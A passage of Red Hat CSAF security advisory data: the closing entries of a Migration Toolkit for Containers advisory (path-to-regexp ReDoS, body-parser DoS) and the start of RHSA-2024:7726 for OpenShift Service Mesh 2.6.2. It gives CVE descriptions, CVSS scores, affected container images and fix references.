"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "serve-static: Improper Sanitization in serve-static"
},
{
"cve": "CVE-2024-45296",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2024-09-09T19:20:18.127723+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2310908"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in path-to-regexp package, where it turns path strings into regular expressions. In certain cases, path-to-regexp will output a regular expression that can be exploited to cause poor performance. Because JavaScript is single-threaded and regex matching runs on the main thread, poor performance will block the event loop and lead to a denial of service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "path-to-regexp: Backtracking regular expressions cause ReDoS",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64"
],
"known_not_affected": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-45296"
},
{
"category": "external",
"summary": "RHBZ#2310908",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310908"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-45296",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45296"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45296",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45296"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f",
"url": "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6",
"url": "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j",
"url": "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j"
}
],
"release_date": "2024-09-09T19:15:13.330000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-12-10T01:37:19+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:10906"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "path-to-regexp: Backtracking regular expressions cause ReDoS"
},
{
"cve": "CVE-2024-45590",
"cwe": {
"id": "CWE-405",
"name": "Asymmetric Resource Consumption (Amplification)"
},
"discovery_date": "2024-09-10T16:20:29.292154+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311171"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in body-parser. This vulnerability causes denial of service via a specially crafted payload when the URL encoding is enabled.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "body-parser: Denial of Service Vulnerability in body-parser",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64"
],
"known_not_affected": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-45590"
},
{
"category": "external",
"summary": "RHBZ#2311171",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311171"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-45590",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45590"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45590",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45590"
},
{
"category": "external",
"summary": "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce",
"url": "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce"
},
{
"category": "external",
"summary": "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7",
"url": "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7"
}
],
"release_date": "2024-09-10T16:15:21.083000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-12-10T01:37:19+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:10906"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "body-parser: Denial of Service Vulnerability in body-parser"
}
]
}
RHSA-2024:7726
Vulnerability from csaf_redhat - Published: 2024-10-07 09:24 - Updated: 2025-11-21 19:13Summary
Red Hat Security Advisory: Red Hat OpenShift Service Mesh Containers for 2.6.2
Notes
Topic
Red Hat OpenShift Service Mesh Containers for 2.6.2
This update has a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a
detailed severity rating, is available for each vulnerability from the CVE
link(s) in the References section.
Details
Red Hat OpenShift Service Mesh is Red Hat's distribution of the Istio service mesh project, tailored for installation into an OpenShift Container Platform installation.
Security Fix(es):
* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)
* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)
* express: Improper Input Handling in Express Redirects (CVE-2024-43796)
* path-to-regexp: Backtracking regular expressions cause ReDoS (CVE-2024-45296)
* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule
(CVE-2024-43788)
* body-parser: Denial of Service Vulnerability in body-parser (CVE-2024-45590)
* envoy: Malicious log injection via access logs (CVE-2024-45808)
* envoy: Potential to manipulate `x-envoy` headers from external sources (CVE-2024-45806)
* envoy: Envoy crashes for `LocalReply` in HTTP async client (CVE-2024-45810)
* curl: libcurl: ASN.1 date parser overread (CVE-2024-7264)
* envoy: Potential to manipulate `x-envoy` headers from external sources (CVE-2024-45806)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat OpenShift Service Mesh Containers for 2.6.2\n\nThis update has a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a\ndetailed severity rating, is available for each vulnerability from the CVE\nlink(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat OpenShift Service Mesh is Red Hat\u0027s distribution of the Istio service mesh project, tailored for installation into an OpenShift Container Platform installation.\n\nSecurity Fix(es):\n* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)\n* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)\n* express: Improper Input Handling in Express Redirects (CVE-2024-43796)\n* path-to-regexp: Backtracking regular expressions cause ReDoS (CVE-2024-45296)\n* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule\n(CVE-2024-43788)\n* body-parser: Denial of Service Vulnerability in body-parser (CVE-2024-45590)\n* envoy: Malicious log injection via access logs (CVE-2024-45808)\n* envoy: Potential to manipulate `x-envoy` headers from external sources (CVE-2024-45806)\n* envoy: Envoy crashes for `LocalReply` in HTTP async client (CVE-2024-45810)\n* curl: libcurl: ASN.1 date parser overread (CVE-2024-7264)\n* envoy: Potential to manipulate `x-envoy` headers from external sources (CVE-2024-45806)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2024:7726",
"url": "https://access.redhat.com/errata/RHSA-2024:7726"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2301888",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2301888"
},
{
"category": "external",
"summary": "2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "2310908",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310908"
},
{
"category": "external",
"summary": "2311152",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311152"
},
{
"category": "external",
"summary": "2311153",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311153"
},
{
"category": "external",
"summary": "2311154",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311154"
},
{
"category": "external",
"summary": "2311171",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311171"
},
{
"category": "external",
"summary": "2313683",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2313683"
},
{
"category": "external",
"summary": "2313685",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2313685"
},
{
"category": "external",
"summary": "2313687",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2313687"
},
{
"category": "external",
"summary": "OSSM-3337",
"url": "https://issues.redhat.com/browse/OSSM-3337"
},
{
"category": "external",
